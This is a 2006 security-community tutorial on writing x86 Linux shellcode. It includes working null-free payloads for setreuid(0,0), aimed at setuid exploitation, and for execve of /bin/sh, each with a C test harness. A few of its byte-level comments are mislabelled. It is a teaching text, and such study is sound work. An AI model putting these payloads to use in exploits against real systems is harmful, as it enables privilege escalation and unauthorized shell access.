Gotfault Security Community
                                  (GSC)
 
 
---------[ Chapter : 0x900                                             ]
---------[ Subject : Basic Shellcode Writing                           ]
---------[ Author  : dx A.K.A. Thyago Silva                            ]
---------[ Date    : 04/02/2006                                        ]
---------[ Version : 1.0                                               ]
 
 
|=--------------------------------------------------------------------------=|
 
---------[ Table of Contents ]
 
  0x910 - Objective
  0x920 - Requisites
  0x930 - Introduction to Shellcode
  0x940 - Linux System Calls
  0x950 - X86 Registers
  0x960 - Common Assembly Instructions
  0x970 - write()
  0x980 - setreuid()
  0x990 - execve()
  0x9a0 - Conclusion


|=--------------------------------------------------------------------------=|
 
---------[ 0x910 - Objective ]

This paper will show an introduction to write shellcode.

---------[ 0x920 - Requisites ]

Basic knowledge of C, ASM and working with debuggers (gdb & objdump) are
required.

---------[ 0x930 - Introduction to Shellcode ]

Shellcode is machine code that when executed spawns a shell, sometimes.
Shellcode cannot have any null's in it because it is treated as a C 
string and a null will stop the reading of the string. Not all "shellcode"
spawns a shell, this has become a more generic name for a bit of position
independant machine readable code that can be directly executed by the cpu.
Shellcode execution can be triggered by overwriting a stack return address
with the address of the injected shellcode.


---------[ 0x940 - Linux System Calls ]

In addition to the raw assembly instructions found in the processor, Linux
provides the programmer with a set of functions that can be easily executed
from assembly. These are known as system calls, and they are triggered by using
interrupts. A listing of enumerated system calls can be found in 
/usr/include/asm/unistd.h.

Using the few assembly instructions and the system calls found in unistd.h,
many different assembly programs and pieces of bytecode can be written to
perform many different functions.

---------[ 0x950 - X86 Registers ]

Registers are temporary storage locations used to hold data, instructions, or
the results of calculations. They are actually memory areas stored on the cpu
itself, used for extermely fast access to the values within them, this is
because the cpu doesn't have to access a location outside of itself.

Intel has 32 bit registers that can be split up in 16 and 8 bit.

	32 Bit 	16 Bit 	8 Bit (High)  	8 Bit (Low)
	-------------------------------------------
	EAX 	AX 	AH 		AL
	EBX 	BX 	BH 		BL
	ECX 	CX 	CH 		CL
	EDX 	DX 	DH 		DL

EAX, AX, AH and AL:

	* Are called as the "Accumulator" registers.

EBX, BX, BH, and BL:

	* Are the "Base" registers.

ECX, CX, CH, and CL:

	* Are also known as the "Counter" registers.

EDX, DX, DH, and DL:

	* Are called the "Data" registers.

When you want to execute a system call have to use these registers to prepare
the system call. A very simple example is the exit(0):

[xgc@knowledge:~/shellcode]$ more exit.s
.section        .text

        .global _start

        _start:

        mov	$0x1, %al  # syscall number for exit
        xorl	%ebx, %ebx # zero out EBX register
        int 	$0x80      # changes to kernel mode

Assemble.

[xgc@knowledge:~/shellcode]$ as -o exit.o exit.s

Link.

[xgc@knowledge:~/shellcode]$ ld -o exit exit.o

Disassemble.

[xgc@knowledge:~/shellcode]$ strace ./exit
execve("./exit", ["./exit"], [/* 18 vars */]) = 0
_exit(0)                                = ?
[xgc@knowledge:~/shellcode]$ objdump -d exit

exit:     file format elf32-i386

Disassembly of section .text:

08048074 <_start>:
 8048074:       b0 01                   mov    $0x1,%al
 8048076:       31 db                   xor    %ebx,%ebx
 8048078:       cd 80                   int    $0x80


It is important to always use the smallest registers available to store your
data in. This to avoid NULL bytes in shell code. For example if we would use
the following exit code:

[xgc@knowledge:~/shellcode]$ more exit.s
.section        .text

        .global _start

        _start:

        movl 	$0x1, %eax # syscall number for exit
        xorl 	%ebx, %ebx # zero out EBX register
        int  	$0x80      # changes to kernel mode

Assemble.

[xgc@knowledge:~/shellcode]$ as -o exit.o exit.s

Link.

[xgc@knowledge:~/shellcode]$ ld -o exit exit.o

Disassemble.

[xgc@knowledge:~/shellcode]$ strace ./exit
execve("./exit", ["./exit"], [/* 18 vars */]) = 0
_exit(0)                                = ?

The register 'eax' will be to large to hold our byte with the result that NULL bytes 
will exist in our shellcode result:

[xgc@knowledge:~/shellcode]$ objdump -d exit

exit:     file format elf32-i386

Disassembly of section .text:

08048074 <_start>:
 8048074:       b8 01 00 00 00          mov    $0x1,%eax
 8048079:       31 db                   xor    %ebx,%ebx
 804807b:       cd 80                   int    $0x80


---------[ 0x960 - Common Assembly Instructions ]

The following are some instructions that will be used in the construction of
shellcode.

------------------------------------------------------------------------------------
Instruction 	Name/Syntax 		Description
------------------------------------------------------------------------------------
MOV		move instruction/       Move the value from src into
		mov src, dest 		dest
------------------------------------------------------------------------------------
ADD		Add instruction 	Used to add values
		add src, dest 		Add the value in src to dest
------------------------------------------------------------------------------------
SUB		Subtract instruction 	Used to subtract values
		sub src, dest 		Subtract the value in src from dest
------------------------------------------------------------------------------------
PUSH		Push instruction 	Used to push values to the stack
		push target		Push the value in target to the stack
------------------------------------------------------------------------------------
POP		Pop instruction 	Used to pop values from the stack
		pop target		Pop a value from the stack into target
------------------------------------------------------------------------------------
JMP		Jump instruction	Used to change the EIP to a certain address
		jmp address		Change the EIP to the address in address
------------------------------------------------------------------------------------
CALL		Call instruction 	Used like a function call, to change the
		call address		EIP to a certain address
		 			Push the address of the next instruction to
					the stack, and then change the EIP to the
					address in address.
------------------------------------------------------------------------------------	
LEA		Load effective address 	Used to get the address of a piece of memory
		lea src, dest 		Load the address of src into dest
------------------------------------------------------------------------------------
INT		Interrupt		Used to send a signal to the kernel
		int value 		Call interrupt of value
------------------------------------------------------------------------------------


---------[ 0x970 - write() Example ]

Now some shellcode to print a string.

[xgc@knowledge:~/shellcode]$ man 2 write

WRITE(2)                   Linux Programmer's Manual                  WRITE(2)

NAME
       write - write to a file descriptor

SYNOPSIS
       #include <unistd.h>

       ssize_t write(int fd, const void *buf, size_t count);

DESCRIPTION
       write  writes  up  to  count  bytes  to the file referenced by the file
       descriptor fd from the buffer starting at buf.  POSIX requires  that  a
       read()  which  can  be  proved  to  occur  after a write() has returned
       returns the new data.  Note that not all file systems  are  POSIX  con-
       forming.


It takes the file descriptor as the first argument, which is an integer.
The standard output device is 1, so to print to the terminal (STDOUT), this
argument should be 1. 

The second argument is a pointer to a character buffer containing the string to
be written.

The final argument is the size of this character buffer.

[xgc@knowledge:~/shellcode]$ grep __NR_write /usr/include/asm/unistd.h
#define __NR_write                4

[xgc@knowledge:~/shellcode]$ grep __NR_exit /usr/include/asm/unistd.h
#define __NR_exit                 1


	write(int fd, const void *buf, size_t count);
        ---------------------------------------------
	EAX	  EBX		 ECX	      EDX

	
	xorl	%ebx, %ebx	# zero out EBX register

The value of 4 needs to be put into the EAX register, because the write()
function is system call number 4.

	push	$0x4		# pushes write syscall into the stack
	popl	%eax		# takes off 0x4 from stack to eax register
	
The address of the string in the data segment needs to be put into ECX.
All strings must have a NULL termination, as EBX = 0, then:

	pushl	%ebx		# pushes 0 into the stack
	pushl	$0x0a0d4141	# pushes "\n\rAA" into the stack
	movl    %esp, %ecx      # moves stack's content to ecx register

Then the value of 1 needs to be put into EBX, because the first argument of
write() is an integer representing the file descriptor (in this case, it is
the standard output device, which is 1).

	incl	%ebx		# increment EBX by 1

And finally, the length of this string (in this case, 04) needs to be put into
EDX.

        push    $0x4            # pushes 0x4 into the stack
        popl    %edx            # takes off 0x4 (len) to edx register


After these registers are loaded, the system call interrupt is called,
which will call the write() function.

	int	$0x80		# changes to kernel mode

To exit cleanly, the exit() function needs to be called, and it should take a
single argument of 0. So the value of 1 needs to be put into EAX, because
exit() is system call number 1.

	xorl	%eax, %eax	# zero out EAX register
	incl	%eax		# increment EAX by 1

And the value of 0 needs to be put into EBX, because the first and only argument
should be 0. Then the system call interrupt should be called one last time.

	xorl	%ebx, %ebx	# zero out EBX register
	int	$0x80		# changes to kernel mode

So assemble, link, strace, execute and disassemble it.

[xgc@knowledge:~/shellcode]$ as write.s -o write.o
[xgc@knowledge:~/shellcode]$ ld write.o -o write
[xgc@knowledge:~/shellcode]$ strace ./write
execve("./hello", ["./hello"], [/* 18 vars */]) = 0
write(1, "AA\r\n", 4AA
)                   = 4
_exit(1)                                = ?
[xgc@knowledge:~/shellcode]$ ./write
AA
[xgc@knowledge:~/shellcode]$ objdump -d ./write

./hello:     file format elf32-i386

Disassembly of section .text:

08048074 <_start>:
 8048074:       31 db                   xor    %ebx,%ebx
 8048076:       6a 04                   push   $0x4
 8048078:       58                      pop    %eax
 8048079:       53                      push   %ebx
 804807a:       68 41 41 0d 0a          push   $0xa0d4141
 804807f:       89 e1                   mov    %esp,%ecx
 8048081:       43                      inc    %ebx
 8048082:       6a 04                   push   $0x4
 8048084:       5a                      pop    %edx
 8048085:       cd 80                   int    $0x80
 8048087:       31 c0                   xor    %eax,%eax
 8048089:       31 db                   xor    %ebx,%ebx
 804808b:       40                      inc    %eax
 804808c:       cd 80                   int    $0x80
[xgc@knowledge:~/shellcode]$

Create the shellcode string from the disassembly and make a C string out of
it, hex chars need a '\x' in front of them: I have:

  "\x31\xdb"                    // xor  %ebx, %ebx
  "\x6a\x04"                    // push $0x4
  "\x58"                        // pop  %eax
  "\x53"                        // push %edx
  "\x68\x41\x41\x0d\x0a"        // push $0x0a0d4141
  "\x89\xe1"                    // mov  %esp, %ecx
  "\x43"                        // inc  %ebx
  "\x6a\x04"                    // push $0x4
  "\x5a"                        // pop  %edx
  "\xcd\x80"                    // int  $0x80
  "\x31\xc0"                    // xor  %eax, %eax
  "\x31\xdb"                    // xor  %ebx, %ebx
  "\x40"                        // inc  %eax
  "\xcd\x80";                   // int  $0x80

Put it in a test file, compile and run it.

[xgc@knowledge:~/shellcode]$ more write.c
char shellcode[] =

  "\x31\xdb"                    // xor  %ebx, %ebx
  "\x6a\x04"                    // push $0x4
  "\x58"                        // pop  %eax
  "\x53"                        // push %edx
  "\x68\x41\x41\x0d\x0a"        // push $0x0a0d4141
  "\x89\xe1"                    // mov  %esp, %ecx
  "\x43"                        // inc  %ebx
  "\x6a\x04"                    // push $0x4
  "\x5a"                        // pop  %edx
  "\xcd\x80"                    // int  $0x80
  "\x31\xc0"                    // xor  %eax, %eax
  "\x31\xdb"                    // xor  %ebx, %ebx
  "\x40"                        // inc  %eax
  "\xcd\x80";                   // int  $0x80

int main() {

        int (*f)() = (int(*)())shellcode;
        printf("Length: %u\n", strlen(shellcode));
        f();
}
[xgc@knowledge:~/shellcode]$ gcc -o write write.c
[xgc@knowledge:~/shellcode]$ ./write
Length: 26
AA
[xgc@knowledge:~/shellcode]$


---------[ 0x980 - setreuid() Example ]


[xgc@knowledge:~/shellcode]$ man setreuid

SETREUID(2)                Linux Programmer's Manual               SETREUID(2)

NAME
       setreuid, setregid - set real and/or effective user or group ID

SYNOPSIS
       #include <sys/types.h>
       #include <unistd.h>

       int setreuid(uid_t ruid, uid_t euid);
       int setregid(gid_t rgid, gid_t egid);

DESCRIPTION
       setreuid sets real and effective user IDs of the current process.

Sometimes we may be in need of some "privilege restoration routines" which
restore a given process' root privileges whenever they are processed by it
but are temporarily unavailable because of some security reasons. These
routines are especially useful for exploiting vulnerabilities in certain
setuid binaries, the ones that revert but do not completely drop their
elevated privileges. setreuid is one of them, and sets the process' real and
effective user id's.

[xgc@knowledge:~/shellcode]$ grep __NR_setreuid /usr/include/asm/unistd.h
#define __NR_setreuid            70

We set EAX 0x46 which is sys_setreuid's value, 

	push	$0x46		# pushes setreuid syscall into the stack
	popl	%eax		# takes off 0x46 from stack to EAX register

EBX to the real userid,

	xorl	%ebx, %ebx	# zero out EBX register


and ECX to the effective userid.

	xorl	%ecx, %ecx	# zero out ECX register

	int	$0x80		# changes to kernel mode

To exit cleanly, the exit() function needs to be called, and it should take a
single argument of 0. So the value of 1 needs to be put into EAX, because
exit() is system call number 1.

	xorl	%eax, %eax	# zero out EAX register
	incl	%eax		# increment EAX by 1

And the value of 0 needs to be put into EBX, because the first and only argument
should be 0. Then the system call interrupt should be called one last time.

	xorl	%ebx, %ebx	# zero out EBX register
	int	$0x80		# changes to kernel mode

So assemble, link, strace, execute and disassemble it.

[xgc@knowledge:~/shellcode]$ as setreuid.s -o setreuid.o
[xgc@knowledge:~/shellcode]$ ld setreuid.o -o setreuid
[xgc@knowledge:~/shellcode]$ strace ./setreuid
execve("./setreuid", ["./setreuid"], [/* 18 vars */]) = 0
setreuid(0, 0)                          = -1 EPERM (Operation not permitted)
_exit(0)                                = ?
[xgc@knowledge:~/shellcode]$ ./setreuid
[xgc@knowledge:~/shellcode]$ objdump -d ./setreuid

./setreuid:     file format elf32-i386

Disassembly of section .text:

08048074 <_start>:
 8048074:       6a 46                   push   $0x46
 8048076:       58                      pop    %eax
 8048077:       31 db                   xor    %ebx,%ebx
 8048079:       31 c9                   xor    %ecx,%ecx
 804807b:       cd 80                   int    $0x80
 804807d:       31 c0                   xor    %eax,%eax
 804807f:       40                      inc    %eax
 8048080:       31 db                   xor    %ebx,%ebx
 8048082:       cd 80                   int    $0x80
[xgc@knowledge:~/shellcode]$


---------[ 0x990 - execve() Example ]

[xgc@knowledge:~/shellcode]$ man execve

EXECVE(2)                  Linux Programmer's Manual                 EXECVE(2)

NAME
       execve - execute program

SYNOPSIS
       #include <unistd.h>

       int  execve(const  char  *filename,  char  *const  argv [], char *const
       envp[]);

This is the sweetest part. Basing what we've learned so far, lets try coding a
shellcode which spawns an interactive shell.

There's no need for an exit() function call, because an interactive program is
being spawned.

It's obvious that ECX has the address of argv[] and EDX has the address of env[].
They are pointers to character arrays. Environment variables can be set to NULL,
which means we can have a zero in EDX, however, we need to supply argv[0] the
name of the program at least. Since argv[] will be NULL terminated, argv[1] will
be zero also. So we'll need to:

    * have the string "/bin/sh" somewhere in memory
    * write the address of that into EBX
    * create a char ** which holds the address of the former "/bin/sh" and
      the address of a NULL.
    * write the address of that char ** into ECX.
    * write zero into EDX.
    * changes to kernel mode


First write a NULL terminated "/bin/sh" into memory. We can do this by pushing
a NULL and an adjacent "/bin/sh" into stack:

Create a NULL in EAX. This will be used for terminating the string: 

	xorl	%eax, %eax

Push that zero (null) into stack:

	pushl	%eax

Push "//sh":

	pushl	$0x68732f2f

Push "/bin":

	pushl	$0x6e69622f

At this moment, ESP points at the starting address of "/bin//sh". We can safely
write this into EBX:

	movl 	%esp, %ebx

EAX is still zero. We can use this to terminate char **argv:

	pushl	%eax

If we push the address of "/bin//sh" into stack too, the address of the pointer to
character array argv will be at ESP. In this way, we have created the char **argv
in the memory:

	pushl	%ebx

And write the address of argv into ECX:

	movl 	%esp, %ecx

EDX may happily be zero.

	xorl 	%edx, %edx

sys_execve = 0xb. That should be in EAX:

	movb 	$0xb, %al

Trigger the interrupt and enter kernel mode:

	int	$0x80

So assemble, link, execute and disassemble it.

[xgc@knowledge:~/shellcode]$ as execve.s -o execve.o
[xgc@knowledge:~/shellcode]$ ld execve.o -o execve
[xgc@knowledge:~/shellcode]$ ./execve
sh-2.05b$ exit
exit
[xgc@knowledge:~/shellcode]$ objdump -d ./execve

./execve:     file format elf32-i386

Disassembly of section .text:

08048074 <_start>:
 8048074:       31 c0                   xor    %eax,%eax
 8048076:       50                      push   %eax
 8048077:       68 2f 2f 73 68          push   $0x68732f2f
 804807c:       68 2f 62 69 6e          push   $0x6e69622f
 8048081:       89 e3                   mov    %esp,%ebx
 8048083:       50                      push   %eax
 8048084:       53                      push   %ebx
 8048085:       89 e1                   mov    %esp,%ecx
 8048087:       31 d2                   xor    %edx,%edx
 8048089:       b0 0b                   mov    $0xb,%al
 804808b:       cd 80                   int    $0x80
[xgc@knowledge:~/shellcode]$

Create the shellcode string from the disassembly and make a C string out of
it, hex chars need a '\x' in front of them: I have:

  "\x31\xc0"                    // xor    %eax, %eax
  "\x50"                        // push   %eax
  "\x68\x2f\x2f\x73\x68"        // push   $0x68732f2f
  "\x68\x2f\x62\x69\x6e"        // push   $0x6e69622f
  "\x89\xe3"                    // mov    %esp, %ebx
  "\x50"                        // push   %eax
  "\x53"                        // push   %ebx
  "\x89\xe1"                    // mov    %esp, %ecx
  "\x31\xd2"                    // mov    %edx, %edx
  "\xb0\x0b"                    // mov    $0xb, %al
  "\xcd\x80";                   // int    $0x80

Put it on a test file, compile and run:

[xgc@knowledge:~/shellcode]$ more execve.c
char shellcode[] =

  "\x31\xc0"                    // xor    %eax, %eax
  "\x50"                        // push   %eax
  "\x68\x2f\x2f\x73\x68"        // push   $0x68732f2f
  "\x68\x2f\x62\x69\x6e"        // push   $0x6e69622f
  "\x89\xe3"                    // mov    %esp, %ebx
  "\x50"                        // push   %eax
  "\x53"                        // push   %ebx
  "\x89\xe1"                    // mov    %esp, %ecx
  "\x31\xd2"                    // mov    %edx, %edx
  "\xb0\x0b"                    // mov    $0xb, %al
  "\xcd\x80";                   // int    $0x80

int main() {

        int (*f)() = (int(*)())shellcode;
        printf("Length: %u\n", strlen(shellcode));
        f();
}

[xgc@knowledge:~/shellcode]$ gcc -o execve execve.c
[xgc@knowledge:~/shellcode]$ ./execve
Length: 25
sh-2.05b$


---------[ 0x9a0 - Conclusion ]

Theres many ways to make shellcodes smaller, and with shellcode the 
smaller the better.

Using the mentioned logic, anyone can construct millions of fantastic shellcodes.
What is necessary is just a little bit attention.